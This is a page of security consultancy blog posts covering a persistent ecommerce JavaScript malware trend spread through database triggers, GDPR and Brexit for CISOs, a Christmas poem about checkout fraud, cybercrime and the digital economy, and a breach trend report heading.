Uncategorised

Emerging Trend: Persistent JavaScript Ecommerce Malware

Our analysts report another trend that Administrators should be aware of.  This is a JavaScript-based eCommerce malware that enables the malware to re-infect websites automatically upon incomplete removal.  It has been identified as a new technique being used by cyber criminals.

This type of malware obtains its persistence by modifying databases to force the injection of a malicious JavaScript file into an eCommerce webpage. By targeting databases, the malware therefore becomes resilient to normal removal attempts. Cyber criminals have recently used this technique to target eCommerce merchants by successfully injecting the JavaScript code into a database field of a merchants website and compromising payment card data.

This malware reinfection method can be used on any eCommerce platform that uses database fields to populate content on the shopping cart webpage. Reinfection of websites can be done with the following processes:
1. A database trigger is added to the order table, which injects the malicious JavaScript link into the website template fields.
2. The trigger is executed every time a new order is made.

Scanning for malicious code in HTML files is not sufficient enough to detect this malware alone. Analysis of the database is required to ensure a proper clean-up of JavaScript eCommerce malware is conducted.
Regular scanning of webservers for malware is one recommended mitigation measure eCommerce websites can take to identify security vulnerabilities. Another recommended best practice is to check for malicious database triggers on eCommerce websites and subsequently remove these.

If you are in doubt, contact the SRM  team who can arrange to run a check for you!

Managing Director of SRM, Tom F is a regular contributor to the SRM blog.

The uncertainty of Brexit, the certainty of GDPR and the responsibilities of the CISO

As Britain navigates its way through the choppy waters of Brexit, there is a great deal of uncertainty about exactly what form our new relationship with Europe will take. In many ways our trading relationships will change; this is the inevitable uncertainty. But on one level the situation is significantly clearer: UK businesses will still be required to comply with EU law if they wish to maintain any trade links with European customers. So the General Data Protection Regulation (GDPR) which comes into effect on 25th May 2018 will still apply to most of us.

But the trouble with certainty is that it is rarely ever that simple. When it comes to our relationship with Europe it appears that the words of John Allen Paulos, an American Professor of Mathematics apply: ‘Uncertainty is the only certainty there is’. So where does this leave the CISO, whose responsibility it is to ensure compliance with not only GDPR but also any future UK and EU regulations? Well the clever mathematician went on to say that ‘knowing how to live with insecurity is the only security.’ And this is the key.

By accepting a degree of insecurity and establishing a means by which to manage it, a CISO can maintain compliance and provide strategic direction for the company’s information security agenda. The following steps will help to navigate this difficult course.

  1. Continue to steer towards whole company compliance with the existing information security standards like PCI DSS, Cyber Essentials, ISO 27001 and ISO 9001. Embedding these standards within your business will ensure you are well placed to deal with new challenges on the horizon.
  2. Work with an established professional team which will not only help you set your course but will also support, enhance and resource your information security strategic agenda. As industry experts they will know about impending changes and will ensure your compliance objectives take these into account.
  3. Make sure everyone on your ship is heading in the same direction. To do this you will need to exert board level influence. With access to high level of technical expertise and strategic guidance the CISO will be able to articulate the state of information security to the company stakeholders and lead employees, accessing company-wide support and making the case for adequate resource. This will set you up to be flexible and responsive to change.

SRM’s VirutalCISOTM has been developed to provide a cost effective bespoke solution to organisations without a CISO or where a board level strategic adviser is required to ensure Information Security remains high on the board agenda. The SRM VirutalCISOTM has access to an extensive portfolio of professional services to help embed Information Security throughout your organisation.

A Cautionary Christmas Tale

present-1893643_960_720

‘Twas the night before Christmas, and all through the house,

Not an iPad was stirring, nor PC or Mouse;

 

The shopping had been done on the internet with care,

In hope that the presents soon would be there;

 

The payments were processed, at least in their heads,

Until they found out their account was in shreds;

 

What should have resulted in toys in gift wrap;

Had led them into an elaborate trap,

 

The fraudsters had found an outdated website;

And changed the checkout so it wasn’t quite right,

 

Away to the next site, Dad went like a flash;

Not knowing his card was in the fraudsters stash

 

The website looked fine but ‘twas misdirection;

He’d fallen foul of Sequel Injection,

 

The site wasn’t bad, that should be made clear;

But the standards ignored, no PCI here.

 

With hackers so many, so lively and quick;

The change was so easy, it was done in a click,

 

So please spare a thought, when you next do your shopping,

And check that the site that you found while you’re hopping,

 

Is up to the standard to which we’re reliant;

And make sure it’s one that is PCI compliant.

 

Information Security Consultant, SRM's Principal PCI DSS QSA and Payment Card Industry expert, Paul B is a regular contributor to the SRM blog.

The Digital Economy

Decentralized cryptocurrencies and Dark Web cartels challenge the effectiveness of legislation, jurisdiction and law enforcement. This poses the question, when the economy is becoming more and more dependent on the internet, is the government losing control?

I’ll leave you to make that decision.

The government uses laws and theories to control and protect economic activity. But what is the significance of the Proceeds of Crime Act 2002 when funds are being stolen and converted into Bitcoin – a decentralized currency that no government has control over? What is the significance of international indictment agreements when the Dark Web conceals the location of the criminals?

Untraceable. Unrecoverable.  Unidentifiable. These are all terms cyber incompetent businesses should get used to. Those are the consequences of negligence on the ever dynamic scene.

Arguably, more intelligence could assist in finding and bring criminals to justice as we have seen in many other high profile cybercrime services. When police budgets are being cut, what is the likelihood that petty cybercriminals will be caught when resources are so limited? As traffic to the Dark Web is increasing due to its exposure in the media and on primetime television shows, this pressure is likely to increase.

Furthermore, perpetrators are not limited by national borders. The UK has one of the strongest digital economies in the world, accounting for more than 25% of its GDP. Naturally, all this noise makes it a prime target for cyber criminals around the world. We would normally depend on our government to take the necessary steps to protect our economy, however, the freedoms provided by the internet make this more difficult. Thus being aware of the threats is not only beneficial to you, but the entire digital economy.

The internet has reformed the way we do business. The playing field is filled with opportunity, but is more dynamic, volatile and uncertain than ever before, and is starting to have a big role within economies around the world. Whether that worries you or not depends on whether you are prepared!

PCI Breach Trend Report September 2015 – January 2016

The period September 2015 – January 2016 is covered in this issue of SRM’s breach trend report which looks at businesses that had a requirement for a PFI investigation. The data presented looks at the most common types of businesses affected as well as their trading size to present a broad picture of how breaches can occur across the industry.

Breach Trend Report September 2015 – January 2016